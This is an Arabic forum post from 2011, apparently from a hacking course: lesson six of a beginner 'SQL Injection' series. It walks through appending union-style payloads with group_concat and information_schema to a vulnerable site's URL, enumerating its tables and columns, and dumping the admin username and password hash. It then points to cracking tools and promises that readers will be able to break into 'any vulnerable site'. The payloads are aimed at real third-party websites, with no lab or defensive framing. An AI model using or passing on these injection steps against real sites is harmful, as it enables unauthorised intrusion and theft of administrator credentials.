العلم نهضة الامة الإسلامية



مرحبا بك عزيزي الزائر في منتديات ثقافة 2009 شعارنا العلم نهضة الأمة الإسلامية . المرجوا منك أن تعرّف بنفسك و تدخل المنتدى معنا. إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه و شكرا لك ,المدير العام:محمد تابليت . santa


العلم نهضة الامة الإسلامية

شعارنا العلم معرفة شعارنا العلم نهضة الأمة الإسلامية
 
الرئيسيةالبوابةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

.: عدد زوار المنتدى :.

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
أفضل 10 أعضاء في هذا المنتدى
mohamed10060
 
issame1995
 
salah
 
michaal
 
خالدوه
 
abdo
 
malik
 
fio123
 
fouad_tablit
 
leader
 

شاطر | 
 

 {الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
mohamed10060
Admin
Admin
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 201
نقاط : 926
السٌّمعَة : 3
تاريخ التسجيل : 15/09/2009
العمر : 22
الموقع : حاسي مسعود
تعاليق على المنتدى : منتدى من الروائع

مُساهمةموضوع: {الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن   الثلاثاء يوليو 19, 2011 10:03 am


{الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن

السلام عليكم ورحمة الله وركاته
============================
دورة احتراف
SQL Injection

مقدمة من قبل الهكر الجزائري
Mohamed10060

الدرس الثالث من الدورة
^_^

استخراج الجداول والعواميد باستخدام
()group_concat
واستخراج بيانات الادمن

===========================

اليوم درسنا مهم جدا
وهو استخراج كافة الجداول والعواميد الموجودة بقاعدة البيانات
واستخراج بيانات الادمن

نبدأ درسنا بعون الله

=================
اولاا: نقوم بفتح الموقع المصاب ثم نضع مكان العامود المصاب
كود:
group_concat(table_name)
وفي نهاية الرابط
كود:
+from+information_schema.tables+where+table_schema=database()--
بحيث يصبح الرابط كما بهذه الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وبما ان الصورة مش كاملة دا الرابط كامل

كود:


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

طيب الأن نفتح الرابط ونشوف اذا ظهرت الجداول

تمام ظهرت لنا جميع الجداول

ال يهمنا هو
جدول الـ
admin

لان هو بيحوي عامود اليوزر وعامود الباس مدير الموقع

طيب نحفظ اسم الجدول admin

والان نأتي الى استخارج العواميد

نقوم بتبديل بالرابط هو بتغير
كلمة

table_name

الى

column_name

والامر

information_schema.tables

الى

information_schema.columns

واذا ما عرفت تعدل اعمل مثل الي بالصورة


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

طيب اكيد راح تسألوا ليش بدلنا كلمة
table
بكلمة
column

الجواب

عندما وضعنا كلمة table طلبنا استخراج الجداول وعندما وضعنا كلمة column طلبنا استخراج العواميد

طيب الان نفتح الرابط ونشوف العواميد

تمام ظهرت لنا العواميد

ال يهمني فيهم هو عامود
username
وعامود
password

وانتبهو ان بين كل عامود والأخر فاصلة
طيب الان عرفنا اسم جدول الباس واليوزر وهو admin وعرفنا اسماء عامود الباس وعامود اليوزر واليوزر
وهو username و password

طيب الان ايه بدنا نعمل

حنستخرج بيانات الادمن

الان نقوم بحذف
كود:
+information_schema.tables+where+table_schema=database()--


ونضع بدلها
admin
يعني بيصير الامر بنهاية الرابط هكذا
كود:
+from+admin--


ونقوم بتعديل
كود:
group_concat(column_name)


الى

كود:
group_concat(username,0x3a,password)


وهذه صورة توضح


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد التعديل اضفنا الى نهاية الرابط
اسم جدول الادمن وكل واحد يغيره حسب اسم جدول الادمن الموجود بالموقع ال مستهدفه

وقمنا بتعديل

column_name

الى

username,0x3a,password

username:هذه يوجد به يوزر مدير الموقع
password:وهذا يوجد به باسوورد مدير الموقع
0x3a:وهذه تفصل بين اليوزر والباس

طيب الان نفتح الرابط بعد التعديل ونشوف بيانات الادمن



تمام ظهر لنا اليوزر والباس لمدير الموقع

fares
هذا اليوزر
b6c8248b03cb0d3b3f2bb1ac1da66f60

وهذ الباس

ولكنه مشفر للاسف
وهنالك طرق عديدة لفك التشفير
وايضا تستطيع فك التشفير عن طريق برنامج الهافيج

فاعلم اننا لن نستطيع دخول اللوحة ال لفك تشفيرة
وهنالك شروحات كثيرة لفك التشفير

واذا فهمتواهذا الدرس وفهمتوالدروس السابقة اعلموا ان باستطاعتكم اختراق اي موقع
مصاب ولكن قد تواجهكم بعض الحمايات ولن انهي الدورة ال بعداضافة كم درس اخر لتخطي الحمايات
وان شاء الله الى مركز معي انا متاكد انو راح يصير يخترق اي موقع مصاب


===========================

فهذه تكون نهاية الدرس السادس من الدورة ارجو ان يكون الدرس واضح ومفهوم ولي عندو اي استفسار يضعه في هذا الموضوع


الى اللقاء في درس اضافي للدورة

اخوكم في الله
Mohame
d10060
.

_________________التوقيع:
رائــع : تصحيح أخطاء الغير
الأروع : أن لايتحول اقتناص الأخطاء إلى متعة شخصية لديك
رائــع : أن تقدم نصيحة لمن تحب
الأروع : ألا تتحول النصيحة إلى جرح للمشاعر

معاك يالخذرة معاك يدزاير معاك يسعدان

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://thakafa2009.mam9.com
 
{الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
العلم نهضة الامة الإسلامية :: ::الدورات المجانية:: :: دورة مفاهيم أساسية وللمبتدئين في SQL Injection-
انتقل الى: